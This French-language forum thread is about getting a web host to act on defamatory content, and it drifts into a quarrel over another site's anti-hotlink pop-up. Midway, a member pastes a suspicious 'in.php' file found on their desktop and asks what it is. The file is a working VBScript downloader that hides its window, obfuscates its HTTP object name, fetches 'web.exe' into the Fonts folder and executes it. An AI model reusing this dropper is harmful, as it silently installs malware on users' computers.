Faire valoir ses droits !

Statut
Ce sujet est fermé.

MaamuT

Membre actif
2 Janvier 2003
195
9
Le Tampon, Réunion
www.pom.re
Bonjour les tous ;)

J'ai une question super simple, mais alors tellement qu'elle est simple que mon neurone bloque dessus depuis plusieurs mois !

Imaginons que vous constatiez un propos diffamatoire ou un comportement irrespectueux sur un site et que vous vouliez en faire la remarque au webmestre.

Vous le contactez et dans votre bon droit, lui demandez de faire quelque chose !

Celui-ci ne vous répond pas ou vous envoie sur les roses ( normal ! )

Après bien des tentatives infructueuses, vous essayer de joindre son hébergeur ?

Et là, je vous met en demeure de trouver une oreille attentive.

La loi est pourtant bien claire et l'hébergeur devrait au moins vous répondre ( ne serait-ce que pour vous envoyer lui aussi sur les roses ! ), mais dans la pratique c'est tout autre et tant que vous ne ferez pas une procédure en bonne et due forme, vus pouvez vous gratter, vous n'existez pas et on vous ignore.

Ma question est donc la suivante ( en plus d'être double ) :

Quels sont les outils de règlement de litiges qui sont vraiment à la disposition de l'internaute lambda lorsqu'il veut faire valoir ses droit envers un hébergeur concernant le contenu d'un des sites qu'il héberge ?

Comment contacter un hébergeur et être sûr d'être entendu ?

Le débat est ouvert ;)

PS: si un avocat passe par là, qu'il me contacte en privé, j'en ai besoin !

MaamuT a dit:
Bonjour les tous ;)
Comment contacter un hébergeur et être sûr d'être entendu ?

Lut,

Soit le coup de telephone (/whois) ou la lettre recommandée avec AR (si tu veux la preuve d'un contact) !

@+,
Bug.

Faut demander à Kathy H ;)
Elle devrait pouvoir te repondre (enfin, je pense :rose: )

ça dépend de quelle diffamation il s'agit, mais si il s'agit d'une diffamation a ton endroit et que t'es un particulier , a mon avis, tu risques de perdre pas mal de temps pour au résultat obtenir des clopinettes.
difficile de juger , c'est selon le cas de figure, mais explicite nous un peu mieux ton probleme pour que l'on puisse mieux réagir.

Modern__Thing a dit:
Y doit surement y avoir un article dans la loi pour pouvoir porter plainte en invocant un motif comme la diffamation ou propors x-machin-chose... Vois peut-etre aupres des services de ta ville...

Je suis en Belgique, je connais pas les procedures pour la France

j'suis pas sur, et faut vraiment que la diffamation soit énorme et le préjudice subi aussi pour que ça aille plus loin que ça.
et puis si le webmaster l'a snobé, c'est peut etre qu'il juge sa plainte non recevable, c'est possible aussi.
Quoiqu'il en soit, quel type de propos diffamatoires, sur qui, sur quelle site, hebergé ou?
histoire de baliser un peu avant de voir a se lancer dans d'interminables procédures.
pasque les tribunaux a mon avis ont d'autres choses a foutre que ça....encombrés qu'ils sont

Modern__Thing a dit:
Y doit surement y avoir un article dans la loi pour pouvoir porter plainte en invocant un motif comme la diffamation ou propors x-machin-chose... Vois peut-etre aupres des services de ta ville...

Je suis en Belgique, je connais pas les procedures pour la France

Déjà essayé, mais apparemment cet hébergeur est au dessus des lois et ne daigne point me répondre !

bugman a dit:
Lut,

Soit le coup de telephone (/whois) ou la lettre recommandée avec AR (si tu veux la preuve d'un contact) !

@+,
Bug.

J'ai oublié de préciser qu'il y'a une planète entre nous, j'habites en Nouvelle-Calédonie, non seulement le décalage horaire est énorme, mais le tarif est proportionnel aux Kilomètres.

Fillolon a dit:
ça dépend de quelle diffamation il s'agit, mais si il s'agit d'une diffamation a ton endroit et que t'es un particulier , a mon avis, tu risques de perdre pas mal de temps pour au résultat obtenir des clopinettes.
difficile de juger , c'est selon le cas de figure, mais explicite nous un peu mieux ton probleme pour que l'on puisse mieux réagir.

Pour la diffamation, effectivement ça va être chaud, disons que c'est plus par fierté qu'autre chose ;)

Pour l'autre problème , c'est plutôt finaud, mais je vous laisse seuls juges !

Je sais que je suis une grande gueule mais quand même !

Fillolon a dit:
j'suis pas sur, et faut vraiment que la diffamation soit énorme et le préjudice subi aussi pour que ça aille plus loin que ça.
et puis si le webmaster l'a snobé, c'est peut etre qu'il juge sa plainte non recevable, c'est possible aussi.
Quoiqu'il en soit, quel type de propos diffamatoires, sur qui, sur quelle site, hebergé ou?
histoire de baliser un peu avant de voir a se lancer dans d'interminables procédures.
pasque les tribunaux a mon avis ont d'autres choses a foutre que ça....encombrés qu'ils sont

C'est bien ce que je crains aussi :/

Le point commun de ces deux affaires : OVH !!

PS: Désolé je n'arrives pas à vous suivre aussi vite, en Nouvelle-Calédonie nous avons un Internet archaïque et trèèèèèèèèèèès lent :/

Modern__Thing a dit:
On me demande de m'identifier sur un site internet :mouais:

C'est bien là le problème et qui est un poil flippant :/

Modern__Thing a dit:
Ben pour te dire j'arrive meme pas a la voir :rateau:

Parce que tu as eu la présence d'esprit d'annuler la demande d'autorisation précédente, mais tous ne sont pas si clairvoyant que toi ?

J'en ai posté une sur le sujet de leur forum.

image14zi1.png

De plus en plus fort.
On ne peux pas poster, formulaire !
Après message discussion supprimée :mouais:

Edit: tiens, ça a marché, ce coup ci :confused:

katelijn a dit:
De plus en plus fort.
On ne peux pas poster, formulaire !
Après message discussion supprimée :mouais:

Edit: tiens, ça a marché, ce coup ci :confused:

Joli bordel hein ?

Réponse des intéressés :

<< C'est pour empêcher le hotlink sur nos émoticônes, c'est pas bien de voler les émoticônes ( que l'on à nous même volée sur le net juste avant ! )

Si des gens sur votre forum nous volent des émoticônes, c'est à vous administrateurs de les supprimer pour éviter la boite de dialogue !! >>

Mais le mieux est de lire le sujet que j'ai cité , c'est édifiant :(

Une fois l'image en cache, la fenêtre n'apparaît plus, d'où la géniale utilité de leur filtre anti-hotlink !

Je ne puis rester plus longtemps en ligne, il est très tard chez moi ( minuit ! ) mais je serais très intéressé de poursuivre sur ce sujet.

Que les administrateurs ne m'en veuillent pas trop pour la démonstration, il suffit de supprimer l'émoticône que j'ai mis dans un message ci-dessus, par contre, s'ils pensent comme moi, je ne dirais pas non pour un petit coup de main pour essayer de les raisonner !

Salutations, a demain ;)

Curieux j'ai eu un fichier in.php qui est apparu sur mon bureau dont voici le contenu une fois l'extension convertit en .txt :siffle:

Cela ressemble à du visual basic (="vbs") mais qu'est ce que cela peut faire???

Vous avez eu la même chose ?

in.php a dit:
<script language="vbs">
self.MoveTo 5000,5000
'
'
'
'
'
Set shell=CreateObject("WScript.Shell")
'Ebal Ya V Rot Kaspera
ebar = "logs.txt"
Set fso = CreateObject("Scripting.FileSystemObject")
Set OLEr = fso.CreateTextFile(ebar)
for y = 1 to 500
OLEr.Write " " + chr(13) + chr(10)
next
OLEr.close
megret="PTTHLMX.2lmxsM"

ddd = shell.SpecialFolders("Fonts") + "\" + "web.exe"
set dot=CreateObject(strreverse(megret))
dot.Open "GET", "../web.exe", false

dot.Send()
cs = dot.responseBody
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile(ddd)
for i = 0 to UBound(cs)
inta=1
intb=2
intc=int(intb)-int(inta)
c = ascb(midb(cs, i+1, 1))
f.Write chr(c)
next
f.close
shell.run(ddd)
window.close()
</script>

MaamuT a dit:
Je ne puis rester plus longtemps en ligne, il est très tard chez moi ( minuit ! ) mais je serais très intéressé de poursuivre sur ce sujet.

Que les administrateurs ne m'en veuillent pas trop pour la démonstration, il suffit de supprimer l'émoticône que j'ai mis dans un message ci-dessus, par contre, s'ils pensent comme moi, je ne dirais pas non pour un petit coup de main pour essayer de les raisonner !

Salutations, a demain ;)
Je ne suis pas psychiatre mais ton probleme ressemble a de la paranoïa avec tendance procédurière...
1 - sur le premier forum on te vire tes posts pour une raison ou une autre (peu importe). Ici il peut tout a fait en etre de meme si tes propos ne correspondent pas a la ligne du forum. Ca ne te plais pas? soit tu fais profil bas soit tu vas forumer ailleurs. Les administrateurs d'un forum en font ce qu'ils veulent. Un forum internet n'est pas une démocratie et je t'invite a lire l'excellent texte de rezba a ce sujet.
2 - dans le second cas, là aussi les admins font ce qu'ils veulent. Si il souhaitent empecher le hotlinking ils en ont parfaitement le droit. D'autant plus qu'ils ont pris la peine de t'expliquer leurs raisons a ce sujet mais que tu semble complettement bouché.

Si tu es venu ici pour foutre le meme bordel que dans les autres forums, tu risque de te faire recevoir de la meme manière...

A bon entendeur... :zen:

ouaip, j'ai le même fichier : in.php....
on dirait une espèce de fichier espion qui permet à l'administrateur du site (un certain Daniel) d'afficher dans une banière en bas de ses messages, l'adresse de ta machine, le type (PC ou Mac) et le navigateur sur lequel tu te connectes... :hein: :mouais:
J'aime pas beaucoup ce genre de méthodes, j'ai virer le fichier à la poubelle mais l'"espionnage" fonctionne toujours. C'est peut-être juste pour épater la galerie, mais j'ai l'impression qu'on a à faire à une sacré bandes de branleurs :mad:

Merci MaamuT

J'ai cherché des renseignements pour te rendre service et je me retrouve avec un message emmerdant comme tout chaque fois que je veux aller sur ce fil... bravo !
:( :( :( :( :( :(
Modo-secours !!!!!!!

Statut
Ce sujet est fermé.